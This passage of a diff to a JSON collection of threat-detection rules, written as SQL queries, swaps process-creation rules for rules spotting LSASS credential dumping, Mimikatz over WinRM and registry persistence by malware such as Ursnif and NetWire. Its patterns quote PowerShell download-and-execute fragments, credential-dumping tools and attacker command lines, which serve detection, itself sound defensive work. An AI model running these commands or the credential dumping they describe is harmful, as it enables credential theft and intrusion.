ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the \"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX ((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' 